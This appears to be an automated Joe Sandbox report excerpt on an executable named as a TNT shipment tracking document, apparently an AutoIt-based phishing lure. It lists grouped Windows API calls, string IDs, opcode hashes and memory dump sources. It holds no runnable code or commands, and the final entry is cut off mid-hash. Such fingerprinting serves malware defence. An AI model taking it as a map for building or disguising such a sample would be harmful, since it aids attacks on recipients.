                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                      Similarity
                                      • API ID: Window$CreateMessageObjectSendShowStock
                                      • String ID:
                                      • API String ID: 1358664141-0
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0043392E
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • __wsplitpath.LIBCMT ref: 00433950
                                      • __wcsicoll.LIBCMT ref: 00433974
                                      • __wcsicoll.LIBCMT ref: 0043398A
                                      Similarity
                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                      • String ID:
                                      • API String ID: 1187119602-0
                                      APIs
                                      Similarity
                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                      • String ID:
                                      • API String ID: 1597257046-0
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      APIs
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconWindow
                                      • String ID:
                                      • API String ID: 3349847261-0
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                      Similarity
                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                      • String ID:
                                      • API String ID: 2223660684-0
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                      • EndPath.GDI32(?), ref: 00447336
                                      • StrokePath.GDI32(?), ref: 00447344
                                      Similarity
                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                      • String ID:
                                      • API String ID: 2783949968-0
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00472B63
                                      • GetDC.USER32(00000000), ref: 00472B6C
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                      • GetDC.USER32(00000000), ref: 00472BBB
                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00415150
                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                      • __freeptd.LIBCMT ref: 0041516B
                                      • ExitThread.KERNEL32 ref: 00415173
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                      • String ID:
                                      • API String ID: 1454798553-0
                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: Q\E
                                      • API String ID: 909875538-2189900498
                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                      APIs
                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 2652923123-3941886329
                                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: U$\
                                      • API String ID: 2666721431-100911408
                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • __wcsnicmp.LIBCMT ref: 00467288
                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                      • String ID: LPT
                                      • API String ID: 3035604524-1350329615
                                      • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                      • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$h
                                      • API String ID: 4104443479-677774858
                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: &
                                      • API String ID: 2931989736-1010288
                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                      APIs
                                      • _wcslen.LIBCMT ref: 00466825
                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                      APIs
                                      • _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                      • _sprintf.LIBCMT ref: 0040F9AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_sprintf_strlen
                                      • String ID: %02X
                                      • API String ID: 1921645428-436463671
                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
